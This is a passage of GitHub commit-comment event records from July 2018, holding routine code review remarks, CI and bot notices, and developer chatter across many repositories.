builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Distoxicqted/Envoys/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `644f8d98-9286-11e8-9fe4-a965e11c7a8c`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-28T16:50:57Z"}
{"id":"8032561416","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"gruntjs/grunt-contrib-uglify"},"payload":{"comment":{"id":29869479,"position":null,"line":null,"path":null,"commit_id":"f6f834bb6edcd1340a01053c91042b0bdcde4b97","created_at":"2018-07-28T16:51:44Z","updated_at":"2018-07-28T16:51:44Z","author_association":"MEMBER","body":"@alexlamsl for your npm account see https://docs.npmjs.com/getting-started/using-two-factor-authentication. You can do it via the web interface, nothing too weird :P\r\n\r\nFor your repos, go to `https://www.npmjs.com/package/<REPLACE_ME)/access` and Enable the option to `Require Two Factor Authentication to publish or modify settings`"}},"created_at":"2018-07-28T16:51:44Z"}
{"id":"8032561628","type":"CommitCommentEvent","actor":{"login":"vadz"},"repo":{"name":"wxWidgets/wxWidgets"},"payload":{"comment":{"id":29869480,"position":108,"line":108,"path":"include/wx/osx/core/cfdictionary.h","commit_id":"342e4454238b32617fcd1fa49a1117d80a19237a","created_at":"2018-07-28T16:51:53Z","updated_at":"2018-07-28T16:51:53Z","author_association":"CONTRIBUTOR","body":"This results in [this error](https://travis-ci.org/wxWidgets/wxWidgets/jobs/409313559) which looks like it really needs to be fixed."}},"created_at":"2018-07-28T16:51:53Z"}
{"id":"8032561844","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29869482,"position":52,"line":33,"path":"Part_4/Railway.rb","commit_id":"db9281d81ed5f11c80d8a974a8855532f1aba6b4","created_at":"2018-07-28T16:52:03Z","updated_at":"2018-07-28T16:52:03Z","author_association":"NONE","body":"Это верно. Для улучшения читаемости рекомендую сделать массив из stations.first и stations.last и проверить, если станция входит в этот массив"}},"created_at":"2018-07-28T16:52:03Z"}
{"id":"8032561920","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"Piyush3079/phpmyadmin"},"payload":{"comment":{"id":29869483,"position":null,"line":null,"path":null,"commit_id":"dadb2e0d359379fda81626d7f276be06a7046505","created_at":"2018-07-28T16:52:07Z","updated_at":"2018-07-28T16:52:07Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: libraries/classes/Header.php"}},"created_at":"2018-07-28T16:52:07Z"}
{"id":"8032563847","type":"CommitCommentEvent","actor":{"login":"Bulldog6600"},"repo":{"name":"GoogleContainerTools/jib"},"payload":{"comment":{"id":29869491,"position":1,"line":27,"path":"jib-core/src/main/java/com/google/cloud/tools/jib/cache/CacheWriter.java","commit_id":"51b20c451130efde721fb0055337756e779caa23","created_at":"2018-07-28T16:53:31Z","updated_at":"2018-07-28T16:53:31Z","author_association":"NONE","body":"java.nio.file.FileAlreadyExistsException;"}},"created_at":"2018-07-28T16:53:31Z"}
{"id":"8032566582","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29869498,"position":99,"line":70,"path":"Part_4/Railway.rb","commit_id":"db9281d81ed5f11c80d8a974a8855532f1aba6b4","created_at":"2018-07-28T16:55:29Z","updated_at":"2018-07-28T16:55:29Z","author_association":"NONE","body":"В `@route` должен храниться именно объект класса Route, а не коллекция станций. Тогда у нас будет доступ ко всем публичным методам экземпляра класса Route (в том числе и его методов по работе со станциями). "}},"created_at":"2018-07-28T16:55:29Z"}
{"id":"8032567724","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29869506,"position":null,"line":null,"path":null,"commit_id":"424ae0323ca3c0b448b65eefab3470a285453c31","created_at":"2018-07-28T16:56:20Z","updated_at":"2018-07-28T16:56:20Z","author_association":"MEMBER","body":"Wrong checksum, blocks build queue."}},"created_at":"2018-07-28T16:56:20Z"}
{"id":"8032568994","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Distoxicqted/EnderLevels"},"payload":{"comment":{"id":29869509,"position":null,"line":null,"path":null,"commit_id":"a6c20c5f69e501e7618be2dac3d039476fa9d027","created_at":"2018-07-28T16:57:13Z","updated_at":"2018-07-28T16:57:13Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Distoxicqted/EnderLevels/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `448ff744-9287-11e8-803c-50b9a7e713c6`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-28T16:57:13Z"}
{"id":"8032569772","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29869510,"position":100,"line":71,"path":"Part_4/Railway.rb","commit_id":"db9281d81ed5f11c80d8a974a8855532f1aba6b4","created_at":"2018-07-28T16:57:48Z","updated_at":"2018-07-28T16:57:48Z","author_association":"NONE","body":"Тут лучше хранить именно index станции и соответственно назвать переменную `@current_station_index` и установить ее в 0. Потому-что 0 это будет индекс первого элемента в массиве станций."}},"created_at":"2018-07-28T16:57:48Z"}
{"id":"8032570161","type":"CommitCommentEvent","actor":{"login":"montogeek"},"repo":{"name":"webpack/webpack.js.org"},"payload":{"comment":{"id":29869511,"position":22,"line":10,"path":".travis.yml","commit_id":"03e0dcffa2a9b9763d9a28383752b367e6f201cd","created_at":"2018-07-28T16:58:05Z","updated_at":"2018-07-28T16:58:05Z","author_association":"MEMBER","body":"I understood something else, that sounds better, also, those READMEs doesn't change daily, we could update them weekly."}},"created_at":"2018-07-28T16:58:05Z"}
{"id":"8032573725","type":"CommitCommentEvent","actor":{"login":"samsinz"},"repo":{"name":"meteor/simple-todos-react"},"payload":{"comment":{"id":29869524,"position":3,"line":4,"path":"client/main.js","commit_id":"1871470c91712f2799c221acd007458d70bdcfd4","created_at":"2018-07-28T17:00:33Z","updated_at":"2018-07-28T17:00:33Z","author_association":"NONE","body":"Missing import './main.html';\r\n"}},"created_at":"2018-07-28T17:00:33Z"}
{"id":"8032574048","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29869525,"position":101,"line":72,"path":"Part_4/Railway.rb","commit_id":"db9281d81ed5f11c80d8a974a8855532f1aba6b4","created_at":"2018-07-28T17:00:46Z","updated_at":"2018-07-28T17:00:46Z","author_association":"NONE","body":"И тут сразу-же можно будет использовать переменную, которую мы создали в предыдущей строке. Или просто обратиться к первой станции маршрута так.\r\n```\r\nroute.stations.first.take_train(self)\r\n```"}},"created_at":"2018-07-28T17:00:46Z"}
{"id":"8032575354","type":"CommitCommentEvent","actor":{"login":"fmaraque"},"repo":{"name":"fmaraque/odoo"},"payload":{"comment":{"id":29869535,"position":9,"line":11,"path":"MoleQla/Models/seccion.py","commit_id":"8d695c68cb6c7a25dd9c04bf4ec2aa0ff7e0b720","created_at":"2018-07-28T17:01:43Z","updated_at":"2018-07-28T17:01:43Z","author_association":"OWNER","body":"I dit it and now name is displayed as False :/\r\n![image](https://user-images.githubusercontent.com/13137818/43358853-a76d5b20-9298-11e8-96d4-b281ed2e0e64.png)\r\n"}},"created_at":"2018-07-28T17:01:43Z"}
{"id":"8032577065","type":"CommitCommentEvent","actor":{"login":"PeterJCLaw"},"repo":{"name":"sourcebots/simulator"},"payload":{"comment":{"id":29869536,"position":14,"line":8,"path":"sb/robot/vision.py","commit_id":"df207e06ee5baad65b5abb7139c79dbe616407b6","created_at":"2018-07-28T17:03:00Z","updated_at":"2018-07-28T17:03:00Z","author_association":"NONE","body":"The issue here was the _syntax_, rather than the class used. Specifically the problem derives from needing the fields to be defined in order, which isn't something that Python 3.5 preserves (but 3.6 does; it becomes semantically part of the language in 3.7)\r\n\r\nI had expected that we'd use `typing.NamedTuple`, but as a builder rather than a base class:\r\n``` python\r\nPolarCoord = NamedTuple('PolarCoord', (\r\n    ('distance_meters', float),\r\n    ('rot_y_rad', float),\r\n    ('rot_y_deg', float),\r\n))"}},"created_at":"2018-07-28T17:03:00Z"}
{"id":"8032580162","type":"CommitCommentEvent","actor":{"login":"alexlamsl"},"repo":{"name":"gruntjs/grunt-contrib-uglify"},"payload":{"comment":{"id":29869546,"position":null,"line":null,"path":null,"commit_id":"f6f834bb6edcd1340a01053c91042b0bdcde4b97","created_at":"2018-07-28T17:05:09Z","updated_at":"2018-07-28T17:05:09Z","author_association":"CONTRIBUTOR","body":"@XhmikosR thanks for the helpful pointers - I've definitely missed the first part (I don't frequent npmjs.com much, let alone logging in onto it...)\r\n\r\nGot myself a QR code and trying to make sense out of `otpauth://` as I don't have anything on my phone that would work with it."}},"created_at":"2018-07-28T17:05:09Z"}
{"id":"8032580235","type":"CommitCommentEvent","actor":{"login":"RoboMWM"},"repo":{"name":"JethroHotep/PlayerCompass"},"payload":{"comment":{"id":29869549,"position":null,"line":null,"path":null,"commit_id":"7c359f7c9b9be98a3ed2e8439db3c54fec9cb929","created_at":"2018-07-28T17:05:12Z","updated_at":"2018-07-28T17:05:12Z","author_association":"NONE","body":"Wat, why\r\n"}},"created_at":"2018-07-28T17:05:12Z"}
{"id":"8032580603","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29869553,"position":108,"line":76,"path":"Part_4/Railway.rb","commit_id":"db9281d81ed5f11c80d8a974a8855532f1aba6b4","created_at":"2018-07-28T17:05:27Z","updated_at":"2018-07-28T17:05:27Z","author_association":"NONE","body":"self тут можно не использовать. self и так будет объектом по умолчанию. Дальше я бы превернул логику, что-бы избежать проверки на nil. \r\n```\r\nreturn unless next_station\r\n```\r\nМы можем так сделать потому-что в руби все, кроме nil и false является \"правдивыми значениями\", то есть если next_station будет nil/false, то в блок мы не зайдем и отработает ранний возврат"}},"created_at":"2018-07-28T17:05:27Z"}
{"id":"8032581427","type":"CommitCommentEvent","actor":{"login":"vivekchavda2001"},"repo":{"name":"hkpanchani/RKUERP"},"payload":{"comment":{"id":29869558,"position":null,"line":null,"path":null,"commit_id":"86ef015d5bb385362326cdbf13e14c0114f2c9d8","created_at":"2018-07-28T17:06:04Z","updated_at":"2018-07-28T17:06:04Z","author_association":"COLLABORATOR","body":"good job keep it up"}},"created_at":"2018-07-28T17:06:04Z"}
{"id":"8032582044","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29869565,"position":109,"line":77,"path":"Part_4/Railway.rb","commit_id":"db9281d81ed5f11c80d8a974a8855532f1aba6b4","created_at":"2018-07-28T17:06:35Z","updated_at":"2018-07-28T17:06:35Z","author_association":"NONE","body":"Тут у нас должен использоваться метод current_station. Написали - значит нужно использовать."}},"created_at":"2018-07-28T17:06:35Z"}
{"id":"8032582592","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29869567,"position":110,"line":78,"path":"Part_4/Railway.rb","commit_id":"db9281d81ed5f11c80d8a974a8855532f1aba6b4","created_at":"2018-07-28T17:07:00Z","updated_at":"2018-07-28T17:07:00Z","author_association":"NONE","body":"Тут у нас должен использоваться метод next_station. Написали - значит нужно использовать."}},"created_at":"2018-07-28T17:07:00Z"}
{"id":"8032584774","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29869569,"position":111,"line":79,"path":"Part_4/Railway.rb","commit_id":"db9281d81ed5f11c80d8a974a8855532f1aba6b4","created_at":"2018-07-28T17:08:40Z","updated_at":"2018-07-28T17:08:40Z","author_association":"NONE","body":"Нужно добавить слово index в название, что-б название не вводило в заблуждение. И можно использовать \r\n```\r\n@current_station_index = current_station_index + 1\r\n# эквивалентно\r\n@current_station_index += 1\r\n```"}},"created_at":"2018-07-28T17:08:40Z"}
{"id":"8032585099","type":"CommitCommentEvent","actor":{"login":"maffeyl"},"repo":{"name":"AmyOlex/Chrono"},"payload":{"comment":{"id":29869571,"position":null,"line":null,"path":null,"commit_id":"c9614765d46ab3fd37b1a85e087c20d44e98ef8c","created_at":"2018-07-28T17:08:55Z","updated_at":"2018-07-28T17:08:55Z","author_association":"COLLABORATOR","body":"Fixed the tabbing so that it only continues if a valid month is found"}},"created_at":"2018-07-28T17:08:55Z"}
{"id":"8032585817","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29869572,"position":121,"line":86,"path":"Part_4/Railway.rb","commit_id":"db9281d81ed5f11c80d8a974a8855532f1aba6b4","created_at":"2018-07-28T17:09:25Z","updated_at":"2018-07-28T17:09:25Z","author_association":"NONE","body":"см go_ahead"}},"created_at":"2018-07-28T17:09:25Z"}
{"id":"8032586221","type":"CommitCommentEvent","actor":{"login":"cinthiavarela"},"repo":{"name":"Lester2018/ProyectoUnah"},"payload":{"comment":{"id":29869573,"position":null,"line":null,"path":null,"commit_id":"8b2ae70bc4b1e966783af39194e095bad1f8b1f2","created_at":"2018-07-28T17:09:39Z","updated_at":"2018-07-28T17:09:39Z","author_association":"COLLABORATOR","body":"confirmar"}},"created_at":"2018-07-28T17:09:39Z"}
{"id":"8032586652","type":"CommitCommentEvent","actor":{"login":"Louisblossom"},"repo":{"name":"Project-Monad/Game"},"payload":{"comment":{"id":29869574,"position":null,"line":null,"path":null,"commit_id":"1c6b6acfef0e63f3cc5861cc16fbd67e9024153b","created_at":"2018-07-28T17:09:54Z","updated_at":"2018-07-28T17:09:54Z","author_association":"NONE","body":"👌"}},"created_at":"2018-07-28T17:09:54Z"}
{"id":"8032588125","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29869578,"position":126,"line":90,"path":"Part_4/Railway.rb","commit_id":"db9281d81ed5f11c80d8a974a8855532f1aba6b4","created_at":"2018-07-28T17:10:57Z","updated_at":"2018-07-28T17:10:57Z","author_association":"NONE","body":"Тут нужно находить станцию из ```route.stations```"}},"created_at":"2018-07-28T17:10:57Z"}
{"id":"8032588616","type":"CommitCommentEvent","actor":{"login":"martinanderssondotcom"},"repo":{"name":"martinanderssondotcom/dev-mini"},"payload":{"comment":{"id":29869582,"position":null,"line":null,"path":null,"commit_id":"316ab140c7f10a23ed374101346ceffb212404f1","created_at":"2018-07-28T17:11:19Z","updated_at":"2018-07-28T17:11:19Z","author_association":"OWNER","body":"Actually, this commit comment is wrong. I was thinking of box `debian/stretch64` which has no VMware support."}},"created_at":"2018-07-28T17:11:19Z"}
{"id":"8032588970","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29869587,"position":null,"line":null,"path":null,"commit_id":"d2ac426644d56c010cfba275295537118ec71f31","created_at":"2018-07-28T17:11:35Z","updated_at":"2018-07-28T17:11:35Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [036 - Desenvolver Domain - Tipo Pessoa e Pessoa](https://trello.com/c/ocQaBaMH/44-036-desenvolver-domain-tipo-pessoa-e-pessoa)"}},"created_at":"2018-07-28T17:11:35Z"}
{"id":"8032590233","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29869589,"position":131,"line":94,"path":"Part_4/Railway.rb","commit_id":"db9281d81ed5f11c80d8a974a8855532f1aba6b4","created_at":"2018-07-28T17:12:30Z","updated_at":"2018-07-28T17:12:30Z","author_association":"NONE","body":"Тут нужно находить станцию из ```route.stations``` текущий индекс + 1"}},"created_at":"2018-07-28T17:12:30Z"}
{"id":"8032590447","type":"CommitCommentEvent","actor":{"login":"Rnen"},"repo":{"name":"Grover-c13/Smod2"},"payload":{"comment":{"id":29869591,"position":null,"line":null,"path":null,"commit_id":"fbe191d3e6a5d79b8f09bdb3d5ecb72303439952","created_at":"2018-07-28T17:12:39Z","updated_at":"2018-07-28T17:12:39Z","author_association":"NONE","body":"But whats the float for?"}},"created_at":"2018-07-28T17:12:39Z"}
{"id":"8032590481","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29869592,"position":null,"line":null,"path":null,"commit_id":"d82ea6dedcdb7a89793fa7cc08a0975d17356f02","created_at":"2018-07-28T17:12:41Z","updated_at":"2018-07-28T17:12:41Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-77](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-77).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-77-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-28T17:12:41Z"}
{"id":"8032591262","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29869593,"position":136,"line":98,"path":"Part_4/Railway.rb","commit_id":"db9281d81ed5f11c80d8a974a8855532f1aba6b4","created_at":"2018-07-28T17:13:13Z","updated_at":"2018-07-28T17:13:13Z","author_association":"NONE","body":"как в next_station только наоборот."}},"created_at":"2018-07-28T17:13:13Z"}
{"id":"8032591272","type":"CommitCommentEvent","actor":{"login":"SergeStinckwich"},"repo":{"name":"UMMISCO/kendrick"},"payload":{"comment":{"id":29869594,"position":null,"line":null,"path":null,"commit_id":"17e7eab51dc49215a38d13e65c86eac2db750144","created_at":"2018-07-28T17:13:14Z","updated_at":"2018-07-28T17:13:14Z","author_association":"MEMBER","body":"Thanh, don't upload files like that, use the contributing guide here: https://github.com/UMMISCO/kendrick/blob/master/CONTRIBUTING.md\r\nYou need to push a PR in order to review the code."}},"created_at":"2018-07-28T17:13:14Z"}
{"id":"8032591428","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"VoxelGamesLib/dependencies"},"payload":{"comment":{"id":29869595,"position":null,"line":null,"path":null,"commit_id":"66631fc7f4f7f03e6c8043b77a917c62ccd73114","created_at":"2018-07-28T17:13:20Z","updated_at":"2018-07-28T17:13:20Z","author_association":"CONTRIBUTOR","body":"Looks like there have been some additional commits to the head branch since #23 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T17:13:20Z"}
{"id":"8032593083","type":"CommitCommentEvent","actor":{"login":"Ikavunik"},"repo":{"name":"Ikavunik/jeezy"},"payload":{"comment":{"id":29869598,"position":null,"line":null,"path":null,"commit_id":"bb1c4c7a091a9ffa701c6868ba24788e5c8f0deb","created_at":"2018-07-28T17:14:31Z","updated_at":"2018-07-28T17:14:31Z","author_association":"OWNER","body":"[square.github.io-master.zip](https://github.com/Ikavunik/jeezy/files/2238150/square.github.io-master.zip)\r\n"}},"created_at":"2018-07-28T17:14:31Z"}
{"id":"8032593150","type":"CommitCommentEvent","actor":{"login":"jbroot"},"repo":{"name":"jbroot/CS3280FinalGroup"},"payload":{"comment":{"id":29869599,"position":null,"line":null,"path":null,"commit_id":"fd26091564d3e139ce45d423f7b22133a8416fa3","created_at":"2018-07-28T17:14:34Z","updated_at":"2018-07-28T17:14:34Z","author_association":"OWNER","body":"Verified List<Item> was working"}},"created_at":"2018-07-28T17:14:34Z"}
{"id":"8032595438","type":"CommitCommentEvent","actor":{"login":"Bushra-Ankhari"},"repo":{"name":"Bushra-Ankhari/Data-Structure"},"payload":{"comment":{"id":29869608,"position":null,"line":null,"path":null,"commit_id":"ab780097f1e739d10edca8ee40f6a4893b0aafb9","created_at":"2018-07-28T17:16:10Z","updated_at":"2018-07-28T17:16:10Z","author_association":"OWNER","body":"cse\r\nsub :data structure\r\nstudent id:1602013"}},"created_at":"2018-07-28T17:16:10Z"}
{"id":"8032599500","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29869618,"position":null,"line":null,"path":null,"commit_id":"17e6385823fe61dc90f7c271470086c740c84c56","created_at":"2018-07-28T17:18:52Z","updated_at":"2018-07-28T17:18:52Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [037 - Desenvolver Domain - Telefone](https://trello.com/c/q2sBeGts/45-037-desenvolver-domain-telefone)"}},"created_at":"2018-07-28T17:18:52Z"}
{"id":"8032600454","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29869619,"position":null,"line":null,"path":null,"commit_id":"2a1bb50fdda4a34e24f2aedfffd35425c53d1212","created_at":"2018-07-28T17:19:27Z","updated_at":"2018-07-28T17:19:27Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-80](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-80).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-80-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-28T17:19:27Z"}
{"id":"8032602903","type":"CommitCommentEvent","actor":{"login":"MatthewWood"},"repo":{"name":"MHDGhanemBalhawan/first-garage-node-express"},"payload":{"comment":{"id":29869624,"position":46,"line":19,"path":"server.js","commit_id":"092f73cbfbccecfdcc560dff7b0342ed6ec8cc24","created_at":"2018-07-28T17:21:05Z","updated_at":"2018-07-28T17:21:05Z","author_association":"NONE","body":"The first param for app.get is the path of the route. This is the route that the client will call in order to execute the code within this. Making the route a path to a file won't make this file be returned. For more info on routes see: https://expressjs.com/en/guide/routing.html"}},"created_at":"2018-07-28T17:21:05Z"}
{"id":"8032620856","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29869675,"position":null,"line":null,"path":null,"commit_id":"7b0c903914859d47a70e7ca7ec0bd435456d2c59","created_at":"2018-07-28T17:31:23Z","updated_at":"2018-07-28T17:31:23Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [038 - Desenvolver Domain - Endereco](https://trello.com/c/D8LGPGgB/46-038-desenvolver-domain-endereco)"}},"created_at":"2018-07-28T17:31:23Z"}
{"id":"8032621324","type":"CommitCommentEvent","actor":{"login":"Munter"},"repo":{"name":"webpack/webpack.js.org"},"payload":{"comment":{"id":29869678,"position":22,"line":10,"path":".travis.yml","commit_id":"03e0dcffa2a9b9763d9a28383752b367e6f201cd","created_at":"2018-07-28T17:31:40Z","updated_at":"2018-07-28T17:31:40Z","author_association":"COLLABORATOR","body":"The only reason to not re-fetch stuff is us hitting the github API limit imo. Downloading all those README's is extremely fast"}},"created_at":"2018-07-28T17:31:40Z"}
{"id":"8032622113","type":"CommitCommentEvent","actor":{"login":"harlow"},"repo":{"name":"harlow/kinesis-consumer"},"payload":{"comment":{"id":29869684,"position":89,"line":89,"path":"client.go","commit_id":"b875bb56e738bcaa13b5e609b3d371d5ab75959e","created_at":"2018-07-28T17:32:05Z","updated_at":"2018-07-28T17:32:05Z","author_association":"OWNER","body":"i think the intention was if there was an issue w/ the NextShardIterator that we'd try to fetch it again"}},"created_at":"2018-07-28T17:32:05Z"}
{"id":"8032622223","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29869685,"position":null,"line":null,"path":null,"commit_id":"bee0a3de3fc90056902b6202c3158285306aa54e","created_at":"2018-07-28T17:32:08Z","updated_at":"2018-07-28T17:32:08Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3213 "}},"created_at":"2018-07-28T17:32:08Z"}
{"id":"8032622545","type":"CommitCommentEvent","actor":{"login":"alexlamsl"},"repo":{"name":"gruntjs/grunt-contrib-uglify"},"payload":{"comment":{"id":29869686,"position":null,"line":null,"path":null,"commit_id":"f6f834bb6edcd1340a01053c91042b0bdcde4b97","created_at":"2018-07-28T17:32:17Z","updated_at":"2018-07-28T17:32:17Z","author_association":"CONTRIBUTOR","body":"Right got it - this is certainly not straight forward for someone who doesn't have Google attached to his daily life."}},"created_at":"2018-07-28T17:32:17Z"}
{"id":"8032623716","type":"CommitCommentEvent","actor":{"login":"kingheath"},"repo":{"name":"kingheath/explorer"},"payload":{"comment":{"id":29869687,"position":3,"line":20,"path":"addresses/views.py","commit_id":"a9eb85d7b5859d9f306bcb7237cd613969732fe5","created_at":"2018-07-28T17:32:57Z","updated_at":"2018-07-28T17:32:57Z","author_association":"OWNER","body":"`40DAE0323FAE3F167B548DA4F20352D625A618DA3FFDFF6A1CF5FD29BCE771FF`"}},"created_at":"2018-07-28T17:32:57Z"}
{"id":"8032624476","type":"CommitCommentEvent","actor":{"login":"joye-ramone"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29869688,"position":null,"line":null,"path":null,"commit_id":"c2eed60e09b1619232cee43b6b16a687809b66f6","created_at":"2018-07-28T17:33:19Z","updated_at":"2018-07-28T17:33:19Z","author_association":"CONTRIBUTOR","body":"Я это фиксил но ек тут. Для моих кейсов помогло. Но может так правильнее"}},"created_at":"2018-07-28T17:33:19Z"}
{"id":"8032624803","type":"CommitCommentEvent","actor":{"login":"cdutra"},"repo":{"name":"cloudfoundry/bosh"},"payload":{"comment":{"id":29869689,"position":null,"line":null,"path":null,"commit_id":"7fb072cd2617a2f53807703e37265a78224d671c","created_at":"2018-07-28T17:33:30Z","updated_at":"2018-07-28T17:33:30Z","author_association":"MEMBER","body":"I actually meant to comment on the original commit, this is a revert of a revert."}},"created_at":"2018-07-28T17:33:30Z"}
{"id":"8032624857","type":"CommitCommentEvent","actor":{"login":"Munter"},"repo":{"name":"webpack/webpack.js.org"},"payload":{"comment":{"id":29869690,"position":22,"line":10,"path":".travis.yml","commit_id":"03e0dcffa2a9b9763d9a28383752b367e6f201cd","created_at":"2018-07-28T17:33:32Z","updated_at":"2018-07-28T17:33:32Z","author_association":"COLLABORATOR","body":"We can just have Travis run the list update for us: https://docs.travis-ci.com/user/cron-jobs/\r\n\r\nI'll have a look at that rewrite"}},"created_at":"2018-07-28T17:33:32Z"}
{"id":"8032625237","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29869691,"position":null,"line":null,"path":null,"commit_id":"fa21c449adabc6a38e05fa41d51447af121e22e9","created_at":"2018-07-28T17:33:44Z","updated_at":"2018-07-28T17:33:44Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3213 "}},"created_at":"2018-07-28T17:33:44Z"}
{"id":"8032625654","type":"CommitCommentEvent","actor":{"login":"trexbatman"},"repo":{"name":"giselyalves13/angelHack2018"},"payload":{"comment":{"id":29869692,"position":null,"line":null,"path":null,"commit_id":"8b11de954a8a5ce543d1b14e21b20759d1a8b61c","created_at":"2018-07-28T17:33:57Z","updated_at":"2018-07-28T17:33:57Z","author_association":"COLLABORATOR","body":"Todos os setores censitários [ftp://geoftp.ibge.gov.br/organizacao_do_territorio/malhas_territoriais/malhas_de_setores_censitarios__divisoes_intramunicipais/censo_2010/setores_censitarios_kmz/](url)"}},"created_at":"2018-07-28T17:33:57Z"}
{"id":"8032625675","type":"CommitCommentEvent","actor":{"login":"cdutra"},"repo":{"name":"cloudfoundry/bosh"},"payload":{"comment":{"id":29869693,"position":null,"line":null,"path":null,"commit_id":"7ae913f195d850175abcd215b580413d26046721","created_at":"2018-07-28T17:33:58Z","updated_at":"2018-07-28T17:33:58Z","author_association":"MEMBER","body":"Could this script be replaced with the current terraform provider we're using to build the database instances?\r\nhttps://www.terraform.io/docs/providers/google/r/sql_database_instance.html#ca_certificate"}},"created_at":"2018-07-28T17:33:58Z"}
